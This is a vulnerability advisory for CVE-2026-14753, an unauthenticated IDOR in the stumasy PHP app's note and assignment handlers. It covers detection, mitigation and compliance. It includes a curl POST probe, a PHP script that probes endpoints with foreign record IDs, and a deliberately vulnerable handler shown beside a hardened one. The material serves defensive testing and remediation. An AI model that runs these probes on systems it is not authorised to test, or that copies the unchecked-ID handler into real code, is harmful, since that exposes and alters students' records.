CVE-2026-14753
Status: Received - Intake

Authorization Bypass in Stumasy Note Handler via assignment_item_id

Vulnerability report for CVE-2026-14753, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-05

Last updated on: 2026-07-05

Assigner: VulDB

Description

A vulnerability was detected in mjperpinosa stumasy up to 327d1b0f2915ba79d7ef8ebb74553e987609d9be. This impacts an unknown function of the file /PHP/objects/notes of the component Note Handler/Assignment Handler. Performing a manipulation of the argument assignment_item_id results in authorization bypass. The attack can be initiated remotely. The exploit is now public and may be used. Continuous delivery with rolling releases is used by this product; therefore, no version details of affected or updated releases are available. The project was informed of the problem early through an issue report but has not responded yet.

Meta Information

Published: 2026-07-05
Last Modified: 2026-07-05
Generated: 2026-07-05
EPSS Evaluated: N/A

Affected Vendors & Products

1 associated CPE
Vendor: mjperpinosa
Product: stumasy
Version / Range: up to and including commit 327d1b0f2915ba79d7ef8ebb74553e987609d9be

Exploitability

CWE ID   Description
CWE-285  The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.
CWE-639  The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data.

Executive Summary

CVE-2026-14753 is an Insecure Direct Object Reference (IDOR) vulnerability in the mjperpinosa stumasy application. Several endpoints take a record ID such as assignment_item_id from POST data and act on that record without checking that the caller has a valid session or owns the record, so a remote attacker, unauthenticated according to this analysis, can read and modify notes and assignment answers simply by supplying another user's record ID.

The affected files are update_assignment_answer.php, retrieve_assignment_answer_to_update.php, update_scratch_data.php, retrieve_scratch_data_to_update.php, delete_scratch_data.php and Notes_controller.php. The root cause is that these handlers look the record up by the client-supplied numeric ID alone, with no check against the active session or an ownership table, so an attacker only needs to guess or enumerate small integers to read and tamper with other students' data.

Impact Analysis

This vulnerability compromises the confidentiality and integrity of student data held in the stumasy application. An attacker can remotely read and modify notes and assignment answers without authenticating, leading to unauthorized disclosure of student work and to silent tampering with submitted answers.

Such access undermines trust in the system: academic records can be altered without the owner's knowledge, and users can no longer rely on the accuracy or privacy of their data.

Detection Guidance

This vulnerability can be detected by testing the affected endpoints for authorization bypass. Post a record ID to each endpoint (a) with no session cookie and (b) with the session of a low-privilege test account that does not own that record, and compare the responses against a request for a record the test account does own. A response that returns or modifies the record in case (a) or (b) confirms the bypass; a redirect to the login page or an empty/error response is the expected, correct behaviour. Test only against an instance you are authorised to assess, point the update_* and delete_* endpoints at throwaway records, and confirm any write by reading the record back as its owner.

Detection therefore consists of sending crafted HTTP POST requests to the vulnerable endpoints with different assignment_item_id or other record-ID values and observing whether data is returned or changed without authentication or ownership.

  • Use curl or a similar tool to send POST requests to update_assignment_answer.php, retrieve_assignment_answer_to_update.php, update_scratch_data.php, retrieve_scratch_data_to_update.php, delete_scratch_data.php and Notes_controller.php. The advisory places these handlers under /PHP/objects/notes; confirm the exact paths on the target before testing.
  • Example unauthenticated probe against the non-destructive read endpoint (targetsite is a placeholder; -v shows the status line and any Location header): curl -X POST -d "assignment_item_id=123" https://targetsite/PHP/objects/notes/retrieve_assignment_answer_to_update.php -v
  • Repeat with -b "PHPSESSID=<session of the non-owning test account>" (PHPSESSID is PHP's default session cookie name; check the actual name on the target) and with several other numeric assignment_item_id values, plus the corresponding record-ID parameters of the other endpoints, to check whether data can be read or modified without authentication or ownership.
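The differential check described above, written out as a small PHP probe. This is an added example, not code from the page or from the stumasy project: the base URL, the cookie value, the record IDs and the parameter name for the scratch-data endpoint (scratch_data_id) are all assumptions, and only the two read endpoints are listed so that the probe cannot modify anything. It needs PHP with the curl extension and an instance you are authorised to test.

```php
<?php
// Added example for this advisory; not code from the page or from the stumasy
// project. Differential IDOR probe: each endpoint receives the same record id
// (a) with no session and (b) with the session of a low-privilege account that
// does NOT own the record. Either request returning the record is a finding.
// Everything marked "assumed" is not from the advisory. Run only against an
// instance you are authorised to test.

$base      = 'http://localhost:8080/PHP/objects/notes/';    // assumed
$nonOwner  = 'PHPSESSID=replace-with-account-A-session';   // assumed: session of account A
$victimIds = [101, 102, 103];                               // assumed: records owned by account B
$endpoints = [
    // endpoint named in the advisory => POST parameter carrying the record id
    'retrieve_assignment_answer_to_update.php' => 'assignment_item_id',
    'retrieve_scratch_data_to_update.php'      => 'scratch_data_id',   // parameter name assumed
];

function post(string $url, array $fields, ?string $cookie): array
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => http_build_query($fields),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,   // a 302 to the login page counts as "denied"
        CURLOPT_TIMEOUT        => 10,
    ]);
    if ($cookie !== null) {
        curl_setopt($ch, CURLOPT_COOKIE, $cookie);
    }
    $body = (string) curl_exec($ch);
    $code = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    return [$code, $body];
}

// Heuristic for "the record came back": HTTP 200 with record-shaped content,
// i.e. a non-empty JSON structure or a pre-filled form field. Calibrate it
// first on a response for a record the test account legitimately owns, then
// reuse it for the foreign ids.
function looksLikeRecord(int $code, string $body): bool
{
    if ($code !== 200 || trim($body) === '') {
        return false;
    }
    $json = json_decode($body, true);
    if (is_array($json) && $json !== []) {
        return true;
    }
    return preg_match('/<(textarea|input)\b[^>]*\bvalue=["\'][^"\']+/i', $body) === 1;
}

foreach ($endpoints as $path => $param) {
    foreach ($victimIds as $id) {
        foreach (['no-session' => null, 'non-owner' => $nonOwner] as $label => $cookie) {
            [$code, $body] = post($base . $path, [$param => $id], $cookie);
            $verdict = looksLikeRecord($code, $body) ? 'LEAK' : 'denied';
            printf("%-42s id=%-5d %-11s HTTP %d  %s\n", $path, $id, $label, $code, $verdict);
        }
    }
}
```

Any line marked LEAK in the no-session column reproduces the unauthenticated access this advisory describes; a LEAK only in the non-owner column is still the CWE-639 ownership bypass. For the update_* and delete_* endpoints, run the same two request variants against a throwaway record and confirm the effect by reading the record back with its owner's session rather than trusting the HTTP status.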
Mitigation Strategies

Immediate mitigation is to add proper authorization checks to every affected endpoint: require an authenticated session, and verify that the session user owns the record identified by assignment_item_id (or the other record IDs) before reading, updating or deleting it.

Restrict the vulnerable endpoints to authenticated users and scope every lookup to the current user, for example by binding the user's ID into the WHERE clause alongside the record ID, so that a foreign ID matches nothing at all rather than relying on a separate check that can be forgotten on the next endpoint.

  • Add session validation and ownership verification in the code handling assignment_item_id and the other record IDs; return the same "not found" response for missing and foreign records so the endpoints cannot be used to enumerate which IDs exist.
  • Monitor web-server and application logs for POST requests to these endpoints that arrive without a session cookie, or that step through sequential numeric IDs from a single client.
  • If possible, temporarily disable or restrict access to the vulnerable endpoints (for example with a web-server rule or network ACL) until a fix is available. Because the project uses rolling releases without version numbers, track the upstream repository at commit level rather than waiting for a tagged release.
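The vulnerable handler shape beside the hardened form the steps above call for, as an added example. This is not the stumasy project's code: the table and column names (assignment_answers, student_id, answer) are assumed, and the session is passed in as an array so the functions can be exercised from the CLI self-check at the bottom instead of reading $_SESSION. It needs PHP with pdo_sqlite.

```php
<?php
// Added example, not code from the page or from the stumasy project. Shows the
// handler shape the advisory describes (record fetched by a client-supplied id
// alone) next to the fix the mitigation section asks for. Table and column
// names are assumed; the session is an array parameter for testability.

// Vulnerable shape (CWE-285 + CWE-639): no session check, no owner check.
// Whoever posts assignment_item_id=123 gets row 123, and an UPDATE written the
// same way would overwrite it.
function retrieveAnswerVulnerable(PDO $db, array $post): ?array
{
    $stmt = $db->prepare('SELECT id, student_id, answer FROM assignment_answers WHERE id = ?');
    $stmt->execute([$post['assignment_item_id'] ?? 0]);
    return $stmt->fetch(PDO::FETCH_ASSOC) ?: null;
}

// Identity comes from the server-side session, never from a POST field.
function currentStudentId(array $session): int
{
    if (!isset($session['student_id']) || !is_int($session['student_id'])) {
        http_response_code(401);
        throw new RuntimeException('login required');
    }
    return $session['student_id'];
}

// Strict integer validation of the record id (rejects "123abc", 0, negatives, "").
function recordId(array $post, string $param = 'assignment_item_id'): ?int
{
    $id = filter_var($post[$param] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hardened read: the owner is bound into the query, so a foreign id matches
// nothing. Missing and foreign records both get 404, so the endpoint cannot be
// used to enumerate which ids exist.
function retrieveAnswerHardened(PDO $db, array $session, array $post): ?array
{
    $studentId = currentStudentId($session);
    $id = recordId($post);
    if ($id === null) {
        http_response_code(400);
        return null;
    }
    $stmt = $db->prepare('SELECT id, student_id, answer FROM assignment_answers WHERE id = ? AND student_id = ?');
    $stmt->execute([$id, $studentId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        http_response_code(404);
        return null;
    }
    return $row;
}

// Hardened write: the same predicate on the UPDATE (and on DELETE). A rowCount
// of 0 means "not yours or missing"; never fall back to an unscoped query.
function updateAnswerHardened(PDO $db, array $session, array $post): bool
{
    $studentId = currentStudentId($session);
    $id = recordId($post);
    if ($id === null) {
        http_response_code(400);
        return false;
    }
    $stmt = $db->prepare('UPDATE assignment_answers SET answer = ? WHERE id = ? AND student_id = ?');
    $stmt->execute([(string) ($post['answer'] ?? ''), $id, $studentId]);
    return $stmt->rowCount() === 1;
}

// CLI self-check against an in-memory SQLite table (constructed sample data).
if (PHP_SAPI === 'cli') {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE assignment_answers (id INTEGER PRIMARY KEY, student_id INTEGER NOT NULL, answer TEXT)');
    $db->exec("INSERT INTO assignment_answers VALUES (123, 1, 'alice'), (124, 2, 'bob')");
    $bob = ['student_id' => 2];
    // Vulnerable: Bob (or nobody at all) reads Alice's row 123.
    var_dump(retrieveAnswerVulnerable($db, ['assignment_item_id' => '123']));
    // Hardened: Bob gets nothing for 123, his own row for 124, and cannot overwrite 123.
    var_dump(retrieveAnswerHardened($db, $bob, ['assignment_item_id' => '123']));
    var_dump(retrieveAnswerHardened($db, $bob, ['assignment_item_id' => '124']));
    var_dump(updateAnswerHardened($db, $bob, ['assignment_item_id' => '123', 'answer' => 'x']));
}
```

The design point is that ownership is enforced by the data access itself (WHERE id = ? AND student_id = ?) rather than by a separate "if owner" branch that each of the six affected files would have to remember; a handler that forgets the check fails closed because it simply has no way to fetch a foreign row.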
Compliance Impact

The vulnerability allows unauthenticated attackers to read and modify notes and assignment answers through insecure direct object references, with no check of user authentication or record ownership. This compromises the confidentiality and integrity of student data.

Unauthorized access to or modification of personal data can put an operator out of compliance with data protection rules that require access controls and data integrity, such as the GDPR or, for student records in the US, FERPA; HIPAA is relevant only where the stored data includes health information.
